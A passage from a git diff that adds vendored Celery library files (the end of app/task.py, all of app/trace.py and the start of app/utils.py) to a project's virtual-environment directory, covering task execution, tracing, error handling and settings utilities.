link_error=None, + task_id=None, retries=None, throw=None, + logfile=None, loglevel=None, headers=None, **options): + """Execute this task locally, by blocking until the task returns. + + Arguments: + args (Tuple): positional arguments passed on to the task. + kwargs (Dict): keyword arguments passed on to the task. + throw (bool): Re-raise task exceptions. + Defaults to the :setting:`task_eager_propagates` setting. + + Returns: + celery.result.EagerResult: pre-evaluated result. + """ + # trace imports Task, so need to import inline. + from celery.app.trace import build_tracer + + app = self._get_app() + args = args or () + kwargs = kwargs or {} + task_id = task_id or uuid() + retries = retries or 0 + if throw is None: + throw = app.conf.task_eager_propagates + + # Make sure we get the task instance, not class. + task = app._tasks[self.name] + + request = { + 'id': task_id, + 'retries': retries, + 'is_eager': True, + 'logfile': logfile, + 'loglevel': loglevel or 0, + 'hostname': gethostname(), + 'callbacks': maybe_list(link), + 'errbacks': maybe_list(link_error), + 'headers': headers, + 'ignore_result': options.get('ignore_result', False), + 'delivery_info': { + 'is_eager': True, + 'exchange': options.get('exchange'), + 'routing_key': options.get('routing_key'), + 'priority': options.get('priority'), + } + } + if 'stamped_headers' in options: + request['stamped_headers'] = maybe_list(options['stamped_headers']) + request['stamps'] = { + header: maybe_list(options.get(header, [])) for header in request['stamped_headers'] + } + + tb = None + tracer = build_tracer( + task.name, task, eager=True, + propagate=throw, app=self._get_app(), + ) + ret = tracer(task_id, args, kwargs, request) + retval = ret.retval + if isinstance(retval, ExceptionInfo): + retval, tb = retval.exception, retval.traceback + if isinstance(retval, ExceptionWithTraceback): + retval = retval.exc + if isinstance(retval, Retry) and retval.sig is not None: + return retval.sig.apply(retries=retries + 1) + state = states.SUCCESS if ret.info is None else ret.info.state + return EagerResult(task_id, retval, state, traceback=tb) + + def AsyncResult(self, task_id, **kwargs): + """Get AsyncResult instance for the specified task. + + Arguments: + task_id (str): Task id to get result for. + """ + return self._get_app().AsyncResult(task_id, backend=self.backend, + task_name=self.name, **kwargs) + + def signature(self, args=None, *starargs, **starkwargs): + """Create signature. + + Returns: + :class:`~celery.signature`: object for + this task, wrapping arguments and execution options + for a single task invocation. + """ + starkwargs.setdefault('app', self.app) + return signature(self, args, *starargs, **starkwargs) + subtask = signature + + def s(self, *args, **kwargs): + """Create signature. + + Shortcut for ``.s(*a, **k) -> .signature(a, k)``. + """ + return self.signature(args, kwargs) + + def si(self, *args, **kwargs): + """Create immutable signature. + + Shortcut for ``.si(*a, **k) -> .signature(a, k, immutable=True)``. + """ + return self.signature(args, kwargs, immutable=True) + + def chunks(self, it, n): + """Create a :class:`~celery.canvas.chunks` task for this task.""" + from celery import chunks + return chunks(self.s(), it, n, app=self.app) + + def map(self, it): + """Create a :class:`~celery.canvas.xmap` task from ``it``.""" + from celery import xmap + return xmap(self.s(), it, app=self.app) + + def starmap(self, it): + """Create a :class:`~celery.canvas.xstarmap` task from ``it``.""" + from celery import xstarmap + return xstarmap(self.s(), it, app=self.app) + + def send_event(self, type_, retry=True, retry_policy=None, **fields): + """Send monitoring event message. + + This can be used to add custom event types in :pypi:`Flower` + and other monitors. + + Arguments: + type_ (str): Type of event, e.g. ``"task-failed"``. + + Keyword Arguments: + retry (bool): Retry sending the message + if the connection is lost. Default is taken from the + :setting:`task_publish_retry` setting. + retry_policy (Mapping): Retry settings. Default is taken + from the :setting:`task_publish_retry_policy` setting. + **fields (Any): Map containing information about the event. + Must be JSON serializable. + """ + req = self.request + if retry_policy is None: + retry_policy = self.app.conf.task_publish_retry_policy + with self.app.events.default_dispatcher(hostname=req.hostname) as d: + return d.send( + type_, + uuid=req.id, retry=retry, retry_policy=retry_policy, **fields) + + def replace(self, sig): + """Replace this task, with a new task inheriting the task id. + + Execution of the host task ends immediately and no subsequent statements + will be run. + + .. versionadded:: 4.0 + + Arguments: + sig (Signature): signature to replace with. + visitor (StampingVisitor): Visitor API object. + + Raises: + ~@Ignore: This is always raised when called in asynchronous context. + It is best to always use ``return self.replace(...)`` to convey + to the reader that the task won't continue after being replaced. + """ + chord = self.request.chord + if 'chord' in sig.options: + raise ImproperlyConfigured( + "A signature replacing a task must not be part of a chord" + ) + if isinstance(sig, _chain) and not getattr(sig, "tasks", True): + raise ImproperlyConfigured("Cannot replace with an empty chain") + + # Ensure callbacks or errbacks from the replaced signature are retained + if isinstance(sig, group): + # Groups get uplifted to a chord so that we can link onto the body + sig |= self.app.tasks['celery.accumulate'].s(index=0) + for callback in maybe_list(self.request.callbacks) or []: + sig.link(callback) + for errback in maybe_list(self.request.errbacks) or []: + sig.link_error(errback) + # If the replacement signature is a chain, we need to push callbacks + # down to the final task so they run at the right time even if we + # proceed to link further tasks from the original request below + if isinstance(sig, _chain) and "link" in sig.options: + final_task_links = sig.tasks[-1].options.setdefault("link", []) + final_task_links.extend(maybe_list(sig.options["link"])) + # We need to freeze the replacement signature with the current task's + # ID to ensure that we don't disassociate it from the existing task IDs + # which would break previously constructed results objects. + sig.freeze(self.request.id) + # Ensure the important options from the original signature are retained + replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1 + sig.set( + chord=chord, + group_id=self.request.group, + group_index=self.request.group_index, + root_id=self.request.root_id, + replaced_task_nesting=replaced_task_nesting + ) + # If the task being replaced is part of a chain, we need to re-create + # it with the replacement signature - these subsequent tasks will + # retain their original task IDs as well + for t in reversed(self.request.chain or []): + sig |= signature(t, app=self.app) + return self.on_replace(sig) + + def add_to_chord(self, sig, lazy=False): + """Add signature to the chord the current task is a member of. + + .. versionadded:: 4.0 + + Currently only supported by the Redis result backend. + + Arguments: + sig (Signature): Signature to extend chord with. + lazy (bool): If enabled the new task won't actually be called, + and ``sig.delay()`` must be called manually. + """ + if not self.request.chord: + raise ValueError('Current task is not member of any chord') + sig.set( + group_id=self.request.group, + group_index=self.request.group_index, + chord=self.request.chord, + root_id=self.request.root_id, + ) + result = sig.freeze() + self.backend.add_to_chord(self.request.group, result) + return sig.delay() if not lazy else sig + + def update_state(self, task_id=None, state=None, meta=None, **kwargs): + """Update task state. + + Arguments: + task_id (str): Id of the task to update. + Defaults to the id of the current task. + state (str): New state. + meta (Dict): State meta-data. + """ + if task_id is None: + task_id = self.request.id + self.backend.store_result( + task_id, meta, state, request=self.request, **kwargs) + + def before_start(self, task_id, args, kwargs): + """Handler called before the task starts. + + .. versionadded:: 5.2 + + Arguments: + task_id (str): Unique id of the task to execute. + args (Tuple): Original arguments for the task to execute. + kwargs (Dict): Original keyword arguments for the task to execute. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_success(self, retval, task_id, args, kwargs): + """Success handler. + + Run by the worker if the task executes successfully. + + Arguments: + retval (Any): The return value of the task. + task_id (str): Unique id of the executed task. + args (Tuple): Original arguments for the executed task. + kwargs (Dict): Original keyword arguments for the executed task. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_retry(self, exc, task_id, args, kwargs, einfo): + """Retry handler. + + This is run by the worker when the task is to be retried. + + Arguments: + exc (Exception): The exception sent to :meth:`retry`. + task_id (str): Unique id of the retried task. + args (Tuple): Original arguments for the retried task. + kwargs (Dict): Original keyword arguments for the retried task. + einfo (~billiard.einfo.ExceptionInfo): Exception information. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_failure(self, exc, task_id, args, kwargs, einfo): + """Error handler. + + This is run by the worker when the task fails. + + Arguments: + exc (Exception): The exception raised by the task. + task_id (str): Unique id of the failed task. + args (Tuple): Original arguments for the task that failed. + kwargs (Dict): Original keyword arguments for the task that failed. + einfo (~billiard.einfo.ExceptionInfo): Exception information. + + Returns: + None: The return value of this handler is ignored. + """ + + def after_return(self, status, retval, task_id, args, kwargs, einfo): + """Handler called after the task returns. + + Arguments: + status (str): Current task state. + retval (Any): Task return value/exception. + task_id (str): Unique id of the task. + args (Tuple): Original arguments for the task. + kwargs (Dict): Original keyword arguments for the task. + einfo (~billiard.einfo.ExceptionInfo): Exception information. + + Returns: + None: The return value of this handler is ignored. + """ + + def on_replace(self, sig): + """Handler called when the task is replaced. + + Must return super().on_replace(sig) when overriding to ensure the task replacement + is properly handled. + + .. versionadded:: 5.3 + + Arguments: + sig (Signature): signature to replace with. + """ + # Finally, either apply or delay the new signature! + if self.request.is_eager: + return sig.apply().get() + else: + sig.delay() + raise Ignore('Replaced by new task') + + def add_trail(self, result): + if self.trail: + self.request.children.append(result) + return result + + def push_request(self, *args, **kwargs): + self.request_stack.push(Context(*args, **kwargs)) + + def pop_request(self): + self.request_stack.pop() + + def __repr__(self): + """``repr(task)``.""" + return _reprtask(self, R_INSTANCE) + + def _get_request(self): + """Get current request object.""" + req = self.request_stack.top + if req is None: + # task was not called, but some may still expect a request + # to be there, perhaps that should be deprecated. + if self._default_request is None: + self._default_request = Context() + return self._default_request + return req + request = property(_get_request) + + def _get_exec_options(self): + if self._exec_options is None: + self._exec_options = extract_exec_options(self) + return self._exec_options + + @property + def backend(self): # noqa: F811 + backend = self._backend + if backend is None: + return self.app.backend + return backend + + @backend.setter + def backend(self, value): + self._backend = value + + @property + def __name__(self): + return self.__class__.__name__ + + +BaseTask = Task # XXX compat alias diff --git a/env/Lib/site-packages/celery/app/trace.py b/env/Lib/site-packages/celery/app/trace.py new file mode 100644 index 00000000..3933d01a --- /dev/null +++ b/env/Lib/site-packages/celery/app/trace.py @@ -0,0 +1,763 @@ +"""Trace task execution. + +This module defines how the task execution is traced: +errors are recorded, handlers are applied and so on. +""" +import logging +import os +import sys +import time +from collections import namedtuple +from typing import Any, Callable, Dict, FrozenSet, Optional, Sequence, Tuple, Type, Union +from warnings import warn + +from billiard.einfo import ExceptionInfo, ExceptionWithTraceback +from kombu.exceptions import EncodeError +from kombu.serialization import loads as loads_message +from kombu.serialization import prepare_accept_content +from kombu.utils.encoding import safe_repr, safe_str + +import celery +import celery.loaders.app +from celery import current_app, group, signals, states +from celery._state import _task_stack +from celery.app.task import Context +from celery.app.task import Task as BaseTask +from celery.exceptions import BackendGetMetaError, Ignore, InvalidTaskError, Reject, Retry +from celery.result import AsyncResult +from celery.utils.log import get_logger +from celery.utils.nodenames import gethostname +from celery.utils.objects import mro_lookup +from celery.utils.saferepr import saferepr +from celery.utils.serialization import get_pickleable_etype, get_pickleable_exception, get_pickled_exception + +# ## --- +# This is the heart of the worker, the inner loop so to speak. +# It used to be split up into nice little classes and methods, +# but in the end it only resulted in bad performance and horrible tracebacks, +# so instead we now use one closure per task class. + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. +# pylint: disable=broad-except +# We know what we're doing... + + +__all__ = ( + 'TraceInfo', 'build_tracer', 'trace_task', + 'setup_worker_optimizations', 'reset_worker_optimizations', +) + +from celery.worker.state import successful_requests + +logger = get_logger(__name__) + +#: Format string used to log task receipt. +LOG_RECEIVED = """\ +Task %(name)s[%(id)s] received\ +""" + +#: Format string used to log task success. +LOG_SUCCESS = """\ +Task %(name)s[%(id)s] succeeded in %(runtime)ss: %(return_value)s\ +""" + +#: Format string used to log task failure. +LOG_FAILURE = """\ +Task %(name)s[%(id)s] %(description)s: %(exc)s\ +""" + +#: Format string used to log task internal error. +LOG_INTERNAL_ERROR = """\ +Task %(name)s[%(id)s] %(description)s: %(exc)s\ +""" + +#: Format string used to log task ignored. +LOG_IGNORED = """\ +Task %(name)s[%(id)s] %(description)s\ +""" + +#: Format string used to log task rejected. +LOG_REJECTED = """\ +Task %(name)s[%(id)s] %(exc)s\ +""" + +#: Format string used to log task retry. +LOG_RETRY = """\ +Task %(name)s[%(id)s] retry: %(exc)s\ +""" + +log_policy_t = namedtuple( + 'log_policy_t', + ('format', 'description', 'severity', 'traceback', 'mail'), +) + +log_policy_reject = log_policy_t(LOG_REJECTED, 'rejected', logging.WARN, 1, 1) +log_policy_ignore = log_policy_t(LOG_IGNORED, 'ignored', logging.INFO, 0, 0) +log_policy_internal = log_policy_t( + LOG_INTERNAL_ERROR, 'INTERNAL ERROR', logging.CRITICAL, 1, 1, +) +log_policy_expected = log_policy_t( + LOG_FAILURE, 'raised expected', logging.INFO, 0, 0, +) +log_policy_unexpected = log_policy_t( + LOG_FAILURE, 'raised unexpected', logging.ERROR, 1, 1, +) + +send_prerun = signals.task_prerun.send +send_postrun = signals.task_postrun.send +send_success = signals.task_success.send +STARTED = states.STARTED +SUCCESS = states.SUCCESS +IGNORED = states.IGNORED +REJECTED = states.REJECTED +RETRY = states.RETRY +FAILURE = states.FAILURE +EXCEPTION_STATES = states.EXCEPTION_STATES +IGNORE_STATES = frozenset({IGNORED, RETRY, REJECTED}) + +#: set by :func:`setup_worker_optimizations` +_localized = [] +_patched = {} + +trace_ok_t = namedtuple('trace_ok_t', ('retval', 'info', 'runtime', 'retstr')) + + +def info(fmt, context): + """Log 'fmt % context' with severity 'INFO'. + + 'context' is also passed in extra with key 'data' for custom handlers. + """ + logger.info(fmt, context, extra={'data': context}) + + +def task_has_custom(task, attr): + """Return true if the task overrides ``attr``.""" + return mro_lookup(task.__class__, attr, stop={BaseTask, object}, + monkey_patched=['celery.app.task']) + + +def get_log_policy(task, einfo, exc): + if isinstance(exc, Reject): + return log_policy_reject + elif isinstance(exc, Ignore): + return log_policy_ignore + elif einfo.internal: + return log_policy_internal + else: + if task.throws and isinstance(exc, task.throws): + return log_policy_expected + return log_policy_unexpected + + +def get_task_name(request, default): + """Use 'shadow' in request for the task name if applicable.""" + # request.shadow could be None or an empty string. + # If so, we should use default. + return getattr(request, 'shadow', None) or default + + +class TraceInfo: + """Information about task execution.""" + + __slots__ = ('state', 'retval') + + def __init__(self, state, retval=None): + self.state = state + self.retval = retval + + def handle_error_state(self, task, req, + eager=False, call_errbacks=True): + if task.ignore_result: + store_errors = task.store_errors_even_if_ignored + elif eager and task.store_eager_result: + store_errors = True + else: + store_errors = not eager + + return { + RETRY: self.handle_retry, + FAILURE: self.handle_failure, + }[self.state](task, req, + store_errors=store_errors, + call_errbacks=call_errbacks) + + def handle_reject(self, task, req, **kwargs): + self._log_error(task, req, ExceptionInfo()) + + def handle_ignore(self, task, req, **kwargs): + self._log_error(task, req, ExceptionInfo()) + + def handle_retry(self, task, req, store_errors=True, **kwargs): + """Handle retry exception.""" + # the exception raised is the Retry semi-predicate, + # and it's exc' attribute is the original exception raised (if any). + type_, _, tb = sys.exc_info() + try: + reason = self.retval + einfo = ExceptionInfo((type_, reason, tb)) + if store_errors: + task.backend.mark_as_retry( + req.id, reason.exc, einfo.traceback, request=req, + ) + task.on_retry(reason.exc, req.id, req.args, req.kwargs, einfo) + signals.task_retry.send(sender=task, request=req, + reason=reason, einfo=einfo) + info(LOG_RETRY, { + 'id': req.id, + 'name': get_task_name(req, task.name), + 'exc': str(reason), + }) + return einfo + finally: + del tb + + def handle_failure(self, task, req, store_errors=True, call_errbacks=True): + """Handle exception.""" + orig_exc = self.retval + + exc = get_pickleable_exception(orig_exc) + if exc.__traceback__ is None: + # `get_pickleable_exception` may have created a new exception without + # a traceback. + _, _, exc.__traceback__ = sys.exc_info() + + exc_type = get_pickleable_etype(type(orig_exc)) + + # make sure we only send pickleable exceptions back to parent. + einfo = ExceptionInfo(exc_info=(exc_type, exc, exc.__traceback__)) + + task.backend.mark_as_failure( + req.id, exc, einfo.traceback, + request=req, store_result=store_errors, + call_errbacks=call_errbacks, + ) + + task.on_failure(exc, req.id, req.args, req.kwargs, einfo) + signals.task_failure.send(sender=task, task_id=req.id, + exception=exc, args=req.args, + kwargs=req.kwargs, + traceback=exc.__traceback__, + einfo=einfo) + self._log_error(task, req, einfo) + return einfo + + def _log_error(self, task, req, einfo): + eobj = einfo.exception = get_pickled_exception(einfo.exception) + if isinstance(eobj, ExceptionWithTraceback): + eobj = einfo.exception = eobj.exc + exception, traceback, exc_info, sargs, skwargs = ( + safe_repr(eobj), + safe_str(einfo.traceback), + einfo.exc_info, + req.get('argsrepr') or safe_repr(req.args), + req.get('kwargsrepr') or safe_repr(req.kwargs), + ) + policy = get_log_policy(task, einfo, eobj) + + context = { + 'hostname': req.hostname, + 'id': req.id, + 'name': get_task_name(req, task.name), + 'exc': exception, + 'traceback': traceback, + 'args': sargs, + 'kwargs': skwargs, + 'description': policy.description, + 'internal': einfo.internal, + } + + logger.log(policy.severity, policy.format.strip(), context, + exc_info=exc_info if policy.traceback else None, + extra={'data': context}) + + +def traceback_clear(exc=None): + # Cleared Tb, but einfo still has a reference to Traceback. + # exc cleans up the Traceback at the last moment that can be revealed. + tb = None + if exc is not None: + if hasattr(exc, '__traceback__'): + tb = exc.__traceback__ + else: + _, _, tb = sys.exc_info() + else: + _, _, tb = sys.exc_info() + + while tb is not None: + try: + tb.tb_frame.clear() + tb.tb_frame.f_locals + except RuntimeError: + # Ignore the exception raised if the frame is still executing. + pass + tb = tb.tb_next + + +def build_tracer( + name: str, + task: Union[celery.Task, celery.local.PromiseProxy], + loader: Optional[celery.loaders.app.AppLoader] = None, + hostname: Optional[str] = None, + store_errors: bool = True, + Info: Type[TraceInfo] = TraceInfo, + eager: bool = False, + propagate: bool = False, + app: Optional[celery.Celery] = None, + monotonic: Callable[[], int] = time.monotonic, + trace_ok_t: Type[trace_ok_t] = trace_ok_t, + IGNORE_STATES: FrozenSet[str] = IGNORE_STATES) -> \ + Callable[[str, Tuple[Any, ...], Dict[str, Any], Any], trace_ok_t]: + """Return a function that traces task execution. + + Catches all exceptions and updates result backend with the + state and result. + + If the call was successful, it saves the result to the task result + backend, and sets the task status to `"SUCCESS"`. + + If the call raises :exc:`~@Retry`, it extracts + the original exception, uses that as the result and sets the task state + to `"RETRY"`. + + If the call results in an exception, it saves the exception as the task + result, and sets the task state to `"FAILURE"`. + + Return a function that takes the following arguments: + + :param uuid: The id of the task. + :param args: List of positional args to pass on to the function. + :param kwargs: Keyword arguments mapping to pass on to the function. + :keyword request: Request dict. + + """ + + # pylint: disable=too-many-statements + + # If the task doesn't define a custom __call__ method + # we optimize it away by simply calling the run method directly, + # saving the extra method call and a line less in the stack trace. + fun = task if task_has_custom(task, '__call__') else task.run + + loader = loader or app.loader + ignore_result = task.ignore_result + track_started = task.track_started + track_started = not eager and (task.track_started and not ignore_result) + + # #6476 + if eager and not ignore_result and task.store_eager_result: + publish_result = True + else: + publish_result = not eager and not ignore_result + + deduplicate_successful_tasks = ((app.conf.task_acks_late or task.acks_late) + and app.conf.worker_deduplicate_successful_tasks + and app.backend.persistent) + + hostname = hostname or gethostname() + inherit_parent_priority = app.conf.task_inherit_parent_priority + + loader_task_init = loader.on_task_init + loader_cleanup = loader.on_process_cleanup + + task_before_start = None + task_on_success = None + task_after_return = None + if task_has_custom(task, 'before_start'): + task_before_start = task.before_start + if task_has_custom(task, 'on_success'): + task_on_success = task.on_success + if task_has_custom(task, 'after_return'): + task_after_return = task.after_return + + pid = os.getpid() + + request_stack = task.request_stack + push_request = request_stack.push + pop_request = request_stack.pop + push_task = _task_stack.push + pop_task = _task_stack.pop + _does_info = logger.isEnabledFor(logging.INFO) + resultrepr_maxsize = task.resultrepr_maxsize + + prerun_receivers = signals.task_prerun.receivers + postrun_receivers = signals.task_postrun.receivers + success_receivers = signals.task_success.receivers + + from celery import canvas + signature = canvas.maybe_signature # maybe_ does not clone if already + + def on_error( + request: celery.app.task.Context, + exc: Union[Exception, Type[Exception]], + state: str = FAILURE, + call_errbacks: bool = True) -> Tuple[Info, Any, Any, Any]: + """Handle any errors raised by a `Task`'s execution.""" + if propagate: + raise + I = Info(state, exc) + R = I.handle_error_state( + task, request, eager=eager, call_errbacks=call_errbacks, + ) + return I, R, I.state, I.retval + + def trace_task( + uuid: str, + args: Sequence[Any], + kwargs: Dict[str, Any], + request: Optional[Dict[str, Any]] = None) -> trace_ok_t: + """Execute and trace a `Task`.""" + + # R - is the possibly prepared return value. + # I - is the Info object. + # T - runtime + # Rstr - textual representation of return value + # retval - is the always unmodified return value. + # state - is the resulting task state. + + # This function is very long because we've unrolled all the calls + # for performance reasons, and because the function is so long + # we want the main variables (I, and R) to stand out visually from the + # the rest of the variables, so breaking PEP8 is worth it ;) + R = I = T = Rstr = retval = state = None + task_request = None + time_start = monotonic() + try: + try: + kwargs.items + except AttributeError: + raise InvalidTaskError( + 'Task keyword arguments is not a mapping') + + task_request = Context(request or {}, args=args, + called_directly=False, kwargs=kwargs) + + redelivered = (task_request.delivery_info + and task_request.delivery_info.get('redelivered', False)) + if deduplicate_successful_tasks and redelivered: + if task_request.id in successful_requests: + return trace_ok_t(R, I, T, Rstr) + r = AsyncResult(task_request.id, app=app) + + try: + state = r.state + except BackendGetMetaError: + pass + else: + if state == SUCCESS: + info(LOG_IGNORED, { + 'id': task_request.id, + 'name': get_task_name(task_request, name), + 'description': 'Task already completed successfully.' + }) + return trace_ok_t(R, I, T, Rstr) + + push_task(task) + root_id = task_request.root_id or uuid + task_priority = task_request.delivery_info.get('priority') if \ + inherit_parent_priority else None + push_request(task_request) + try: + # -*- PRE -*- + if prerun_receivers: + send_prerun(sender=task, task_id=uuid, task=task, + args=args, kwargs=kwargs) + loader_task_init(uuid, task) + if track_started: + task.backend.store_result( + uuid, {'pid': pid, 'hostname': hostname}, STARTED, + request=task_request, + ) + + # -*- TRACE -*- + try: + if task_before_start: + task_before_start(uuid, args, kwargs) + + R = retval = fun(*args, **kwargs) + state = SUCCESS + except Reject as exc: + I, R = Info(REJECTED, exc), ExceptionInfo(internal=True) + state, retval = I.state, I.retval + I.handle_reject(task, task_request) + traceback_clear(exc) + except Ignore as exc: + I, R = Info(IGNORED, exc), ExceptionInfo(internal=True) + state, retval = I.state, I.retval + I.handle_ignore(task, task_request) + traceback_clear(exc) + except Retry as exc: + I, R, state, retval = on_error( + task_request, exc, RETRY, call_errbacks=False) + traceback_clear(exc) + except Exception as exc: + I, R, state, retval = on_error(task_request, exc) + traceback_clear(exc) + except BaseException: + raise + else: + try: + # callback tasks must be applied before the result is + # stored, so that result.children is populated. + + # groups are called inline and will store trail + # separately, so need to call them separately + # so that the trail's not added multiple times :( + # (Issue #1936) + callbacks = task.request.callbacks + if callbacks: + if len(task.request.callbacks) > 1: + sigs, groups = [], [] + for sig in callbacks: + sig = signature(sig, app=app) + if isinstance(sig, group): + groups.append(sig) + else: + sigs.append(sig) + for group_ in groups: + group_.apply_async( + (retval,), + parent_id=uuid, root_id=root_id, + priority=task_priority + ) + if sigs: + group(sigs, app=app).apply_async( + (retval,), + parent_id=uuid, root_id=root_id, + priority=task_priority + ) + else: + signature(callbacks[0], app=app).apply_async( + (retval,), parent_id=uuid, root_id=root_id, + priority=task_priority + ) + + # execute first task in chain + chain = task_request.chain + if chain: + _chsig = signature(chain.pop(), app=app) + _chsig.apply_async( + (retval,), chain=chain, + parent_id=uuid, root_id=root_id, + priority=task_priority + ) + task.backend.mark_as_done( + uuid, retval, task_request, publish_result, + ) + except EncodeError as exc: + I, R, state, retval = on_error(task_request, exc) + else: + Rstr = saferepr(R, resultrepr_maxsize) + T = monotonic() - time_start + if task_on_success: + task_on_success(retval, uuid, args, kwargs) + if success_receivers: + send_success(sender=task, result=retval) + if _does_info: + info(LOG_SUCCESS, { + 'id': uuid, + 'name': get_task_name(task_request, name), + 'return_value': Rstr, + 'runtime': T, + 'args': task_request.get('argsrepr') or safe_repr(args), + 'kwargs': task_request.get('kwargsrepr') or safe_repr(kwargs), + }) + + # -* POST *- + if state not in IGNORE_STATES: + if task_after_return: + task_after_return( + state, retval, uuid, args, kwargs, None, + ) + finally: + try: + if postrun_receivers: + send_postrun(sender=task, task_id=uuid, task=task, + args=args, kwargs=kwargs, + retval=retval, state=state) + finally: + pop_task() + pop_request() + if not eager: + try: + task.backend.process_cleanup() + loader_cleanup() + except (KeyboardInterrupt, SystemExit, MemoryError): + raise + except Exception as exc: + logger.error('Process cleanup failed: %r', exc, + exc_info=True) + except MemoryError: + raise + except Exception as exc: + _signal_internal_error(task, uuid, args, kwargs, request, exc) + if eager: + raise + R = report_internal_error(task, exc) + if task_request is not None: + I, _, _, _ = on_error(task_request, exc) + return trace_ok_t(R, I, T, Rstr) + + return trace_task + + +def trace_task(task, uuid, args, kwargs, request=None, **opts): + """Trace task execution.""" + request = {} if not request else request + try: + if task.__trace__ is None: + task.__trace__ = build_tracer(task.name, task, **opts) + return task.__trace__(uuid, args, kwargs, request) + except Exception as exc: + _signal_internal_error(task, uuid, args, kwargs, request, exc) + return trace_ok_t(report_internal_error(task, exc), TraceInfo(FAILURE, exc), 0.0, None) + + +def _signal_internal_error(task, uuid, args, kwargs, request, exc): + """Send a special `internal_error` signal to the app for outside body errors.""" + try: + _, _, tb = sys.exc_info() + einfo = ExceptionInfo() + einfo.exception = get_pickleable_exception(einfo.exception) + einfo.type = get_pickleable_etype(einfo.type) + signals.task_internal_error.send( + sender=task, + task_id=uuid, + args=args, + kwargs=kwargs, + request=request, + exception=exc, + traceback=tb, + einfo=einfo, + ) + finally: + del tb + + +def trace_task_ret(name, uuid, request, body, content_type, + content_encoding, loads=loads_message, app=None, + **extra_request): + app = app or current_app._get_current_object() + embed = None + if content_type: + accept = prepare_accept_content(app.conf.accept_content) + args, kwargs, embed = loads( + body, content_type, content_encoding, accept=accept, + ) + else: + args, kwargs, embed = body + hostname = gethostname() + request.update({ + 'args': args, 'kwargs': kwargs, + 'hostname': hostname, 'is_eager': False, + }, **embed or {}) + R, I, T, Rstr = trace_task(app.tasks[name], + uuid, args, kwargs, request, app=app) + return (1, R, T) if I else (0, Rstr, T) + + +def fast_trace_task(task, uuid, request, body, content_type, + content_encoding, loads=loads_message, _loc=None, + hostname=None, **_): + _loc = _localized if not _loc else _loc + embed = None + tasks, accept, hostname = _loc + if content_type: + args, kwargs, embed = loads( + body, content_type, content_encoding, accept=accept, + ) + else: + args, kwargs, embed = body + request.update({ + 'args': args, 'kwargs': kwargs, + 'hostname': hostname, 'is_eager': False, + }, **embed or {}) + R, I, T, Rstr = tasks[task].__trace__( + uuid, args, kwargs, request, + ) + return (1, R, T) if I else (0, Rstr, T) + + +def report_internal_error(task, exc): + _type, _value, _tb = sys.exc_info() + try: + _value = task.backend.prepare_exception(exc, 'pickle') + exc_info = ExceptionInfo((_type, _value, _tb), internal=True) + warn(RuntimeWarning( + 'Exception raised outside body: {!r}:\n{}'.format( + exc, exc_info.traceback))) + return exc_info + finally: + del _tb + + +def setup_worker_optimizations(app, hostname=None): + """Setup worker related optimizations.""" + hostname = hostname or gethostname() + + # make sure custom Task.__call__ methods that calls super + # won't mess up the request/task stack. + _install_stack_protection() + + # all new threads start without a current app, so if an app is not + # passed on to the thread it will fall back to the "default app", + # which then could be the wrong app. So for the worker + # we set this to always return our app. This is a hack, + # and means that only a single app can be used for workers + # running in the same process. + app.set_current() + app.set_default() + + # evaluate all task classes by finalizing the app. + app.finalize() + + # set fast shortcut to task registry + _localized[:] = [ + app._tasks, + prepare_accept_content(app.conf.accept_content), + hostname, + ] + + app.use_fast_trace_task = True + + +def reset_worker_optimizations(app=current_app): + """Reset previously configured optimizations.""" + try: + delattr(BaseTask, '_stackprotected') + except AttributeError: + pass + try: + BaseTask.__call__ = _patched.pop('BaseTask.__call__') + except KeyError: + pass + app.use_fast_trace_task = False + + +def _install_stack_protection(): + # Patches BaseTask.__call__ in the worker to handle the edge case + # where people override it and also call super. + # + # - The worker optimizes away BaseTask.__call__ and instead + # calls task.run directly. + # - so with the addition of current_task and the request stack + # BaseTask.__call__ now pushes to those stacks so that + # they work when tasks are called directly. + # + # The worker only optimizes away __call__ in the case + # where it hasn't been overridden, so the request/task stack + # will blow if a custom task class defines __call__ and also + # calls super(). + if not getattr(BaseTask, '_stackprotected', False): + _patched['BaseTask.__call__'] = orig = BaseTask.__call__ + + def __protected_call__(self, *args, **kwargs): + stack = self.request_stack + req = stack.top + if req and not req._protected and \ + len(stack) == 1 and not req.called_directly: + req._protected = 1 + return self.run(*args, **kwargs) + return orig(self, *args, **kwargs) + BaseTask.__call__ = __protected_call__ + BaseTask._stackprotected = True diff --git a/env/Lib/site-packages/celery/app/utils.py b/env/Lib/site-packages/celery/app/utils.py new file mode 100644 index 00000000..0dd3409d --- /dev/null +++ b/env/Lib/site-packages/celery/app/utils.py @@ -0,0 +1,415 @@ +"""App utilities: Compat settings, bug-report tool, pickling apps.""" +import os +import platform as _platform +import re +from collections import namedtuple +from collections.abc import Mapping +from copy import deepcopy +from types import ModuleType + +from kombu.utils.url import maybe_sanitize_url + +from celery.exceptions import ImproperlyConfigured +from celery.platforms import pyimplementation +from celery.utils.collections import ConfigurationView +from celery.utils.imports import import_from_cwd, qualname, symbol_by_name +from celery.utils.text import pretty + +from .defaults import _OLD_DEFAULTS, _OLD_SETTING_KEYS, _TO_NEW_KEY, _TO_OLD_KEY, DEFAULTS, SETTING_KEYS, find + +__all__ = ( + 'Settings', 'appstr', 'bugreport', + 'filter_hidden_settings', 'find_app', +) + +#: Format used to generate bug-report information. +BUGREPORT_INFO = """ +software -> celery:{celery_v} kombu:{kombu_v} py:{py_v} + billiard:{billiard_v} {driver_v} +platform -> system:{system} arch:{arch} + kernel version:{kernel_version} imp:{py_i} +loader -> {loader} +settings -> transport:{transport} results:{results} + +{human_settings} +""" + +HIDDEN_SETTINGS = re.compile( + 'API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE|DATABASE', + re.IGNORECASE, +) + +E_MIX_OLD_INTO_NEW = """ + +Cannot mix new and old setting keys, please rename the +following settings to the new format: + +{renames} + +""" + +E_MIX_NEW_INTO_OLD = """ + +Cannot mix new setting names with old setting names, please +rename the following settings to use the old format: + +{renames} + +Or change all of the settings to use the new format :) + +""" + +FMT_REPLACE_SETTING = '{replace:<36} -> {with_}' + + +def appstr(app): + """String used in __repr__ etc, to id app instances.""" + return f'{app.main or "__main__"} at {id(app):#x}' + + +class Settings(ConfigurationView): + """Celery settings object. + + .. seealso: + + :ref:`configuration` for a full list of configuration keys. + + """ + + def __init__(self, *args, 